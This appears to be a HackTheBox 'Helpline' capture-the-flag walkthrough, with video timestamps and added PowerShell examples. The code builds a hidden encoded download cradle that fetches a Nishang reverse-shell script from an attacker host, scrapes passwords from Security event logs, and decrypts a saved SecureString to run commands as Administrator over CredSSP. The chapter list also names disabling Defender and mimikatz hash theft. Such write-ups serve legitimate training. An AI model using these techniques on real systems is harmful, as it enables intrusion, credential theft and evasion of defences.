HackTheBox - Helpline


00:35 - Begin of Recon
01:42 - Checking the ManageEngine page
02:23 - Running Searchsploit to see potential exploits
03:40 - Enumerating valid usernames via AjaxDomainServlet
05:40 - Logging in with guest:guest
07:10 - Running the privilege escalation script to get Administrator access
08:00 - Searching for information on this exploit
08:20 - Blog post missing... Searching Archive.org and Google Cache for a mirror
10:00 - Making curl go through Burp to step through the exploit in Burp Suite
18:00 - Copying the admin cookies into Firefox
19:25 - Going to Admin then Custom Triggers to execute code on the server
21:50 - Getting a reverse shell via Nishang
22:30 - Using iconv to create UTF-16LE encoded Base64 for use with "-EncodedCommand" option
25:45 - Reverse Shell as System returned, but EFS Protects the flags
26:45 - Finding interesting files with get-childitem -recurse . | select FullName
28:50 - Copying mimikatz over to the box to steal NTLM Hashes
31:00 - Defender blocked us. Disable Defender real-time protection with Set-MpPreference -DisableRealtimeMonitoring $true
32:50 - Using hashes.org to look up Zachary's password, checking his groups to see he can read event logs
33:30 - Doing some PowerShell goodness to search the event logs!
40:50 - Extracting ProcessCommandLine from the logs (Tolu's password). It's a shame the Nishang shell mangles how some commands write to stdout; this could have been a lot cleaner.
43:00 - Using Mimikatz to decrypt the EFS Protected file with Tolu's password
57:25 - Need to read Leo's admin-pass.xml; load Meterpreter and migrate into a process running as Leo
01:00:20 - admin-pass.xml is the output of a SecureString, so let's decrypt it to get the admin password
01:02:20 - Using Invoke-Command with the credential object we created to execute commands as Administrator
01:03:50 - Cannot read root.txt because of the "Double Hop Problem" (how PowerShell authenticates to the remote session); using CredSSP authentication to fix this.
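The 22:30 step builds the argument for powershell.exe -EncodedCommand. The added example below is not the video's own command; it shows the same encoding from the PowerShell side and the pitfall (UTF-8 instead of UTF-16LE) that makes powershell.exe reject the payload. The download cradle URL in it is an assumed placeholder.

```powershell
# Added example, not from the video. -EncodedCommand expects Base64 of the script
# encoded as UTF-16LE, i.e. the bytes that   iconv -t UTF-16LE | base64 -w0   produces
# on Linux. .NET calls that encoding "Unicode".
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Script)   # UTF-16LE
    [System.Convert]::ToBase64String($bytes)
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Base64))
}

# Typical use: a short download cradle rather than the whole Nishang script, because
# the Windows command line is limited to a few thousand characters. URL is an assumption.
$cradle = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1')"
$enc    = ConvertTo-EncodedCommand -Script $cradle

# Round-trip check before firing it at the target
if ((ConvertFrom-EncodedCommand -Base64 $enc) -ne $cradle) { throw 'round-trip mismatch' }

# Pitfall check: the same text Base64-encoded as UTF-8 is a different, unusable payload
$wrong = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cradle))
if ($wrong -eq $enc) { throw 'unexpected: encodings should differ' }

"powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand $enc"
```

If the decoded text contains Chinese-looking characters when you test it, the payload was UTF-8 rather than UTF-16LE encoded; that is the classic symptom of skipping the iconv step.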
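The 33:30 to 40:50 steps pull command lines out of the Security log using Zachary's Event Log Readers membership. The following is an added example, not the commands typed in the video; it assumes process-creation auditing with command-line logging is on (Event ID 4688 with the CommandLine field populated) and that the user and host names shown are placeholders.

```powershell
# Added example, not the video's own code. Reads 4688 (process creation) events and
# returns the command line of each, optionally filtered by a regex. Membership in
# "Event Log Readers" is enough to read the Security log remotely.
function Get-ProcessCommandLines {
    param(
        [string]$ComputerName = 'localhost',
        [pscredential]$Credential,
        [string]$Pattern = '.'          # regex applied to the command line; '.' keeps all
    )
    $params = @{
        FilterHashtable = @{ LogName = 'Security'; Id = 4688 }
        ErrorAction     = 'Stop'
    }
    if ($ComputerName -ne 'localhost') { $params.ComputerName = $ComputerName }
    if ($Credential)                   { $params.Credential   = $Credential }

    Get-WinEvent @params | ForEach-Object {
        # The rendered Message is locale dependent; the XML EventData is not.
        $x = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Account     = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            Process     = $data.NewProcessName
            CommandLine = $data.CommandLine      # empty unless cmdline auditing is enabled
        }
    } | Where-Object { $_.CommandLine -match $Pattern }
}

# Usage (names assumed): hunt for passwords passed on the command line, as with Tolu.
$cred = Get-Credential -UserName 'HELPLINE\zachary' -Message 'Event log reader'
Get-ProcessCommandLines -ComputerName 'helpline' -Credential $cred -Pattern '(?i)pass(word)?' |
    Format-Table -AutoSize -Wrap | Out-String -Width 4096
```

Piping through Out-String -Width 4096 is what keeps long command lines from being truncated in a reverse shell like Nishang's, which is the output problem the video runs into at 40:50.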
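The 57:25 to 01:03:50 steps form one procedure: decrypt Leo's saved SecureString, build a credential object, and run commands as Administrator over CredSSP. The added example below is not the video's own code. It assumes admin-pass.xml was produced either by Export-Clixml on a SecureString or by ConvertFrom-SecureString (both are DPAPI-protected with Leo's key, which is why it has to run inside a process owned by Leo), and the file path and host name are placeholders.

```powershell
# Added example, not from the video. Run this from a process running as Leo, e.g. after
# migrating Meterpreter into one of his processes; DPAPI only unprotects the blob there.
function Get-PlainTextFromSecureStringFile {
    param([Parameter(Mandatory)][string]$Path)
    $raw = (Get-Content -Path $Path -Raw).Trim()
    if ($raw.StartsWith('<Objs')) {
        $secure = Import-Clixml -Path $Path                # Export-Clixml output
    } else {
        $secure = ConvertTo-SecureString -String $raw      # ConvertFrom-SecureString hex blob
    }
    if ($secure -isnot [securestring]) { throw "$Path did not deserialise to a SecureString" }
    # GetNetworkCredential() does the BSTR marshalling for us
    [pscredential]::new('x', $secure).GetNetworkCredential().Password
}

$plain     = Get-PlainTextFromSecureStringFile -Path 'C:\Users\leo\Desktop\admin-pass.xml'   # assumed path
$adminCred = [pscredential]::new('Administrator', (ConvertTo-SecureString $plain -AsPlainText -Force))
$target    = $env:COMPUTERNAME

# First hop: the commands run as Administrator, but the WinRM session holds a network
# logon with no delegated credentials, so it cannot unlock the DPAPI master key that
# protects the Administrator's EFS certificate. whoami works; the EFS file does not.
Invoke-Command -ComputerName $target -Credential $adminCred -ScriptBlock {
    whoami
    Get-Content 'C:\Users\Administrator\Desktop\root.txt' -ErrorAction Continue
}

# Fix: CredSSP sends the actual credentials to the target, giving the session a full
# logon. Both roles must be enabled; the client role names the host allowed to receive
# the credentials. These need local admin, which the SYSTEM shell already has.
Enable-WSManCredSSP -Role Server -Force | Out-Null
Enable-WSManCredSSP -Role Client -DelegateComputer $target -Force | Out-Null

Invoke-Command -ComputerName $target -Credential $adminCred -Authentication CredSSP -ScriptBlock {
    Get-Content 'C:\Users\Administrator\Desktop\root.txt'
}

# Clean up: CredSSP exposes the plaintext credential to the target, so turn it back off.
Disable-WSManCredSSP -Role Client
Disable-WSManCredSSP -Role Server
```

The same CredSSP trick is the standard answer whenever a remote session needs to authenticate onward (a file share, a database, or, as here, the user's own DPAPI-protected keys); the trade-off is that the target receives the password itself, which is acceptable only on a host you already control.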

Reviewed by Unknown on August 17, 2019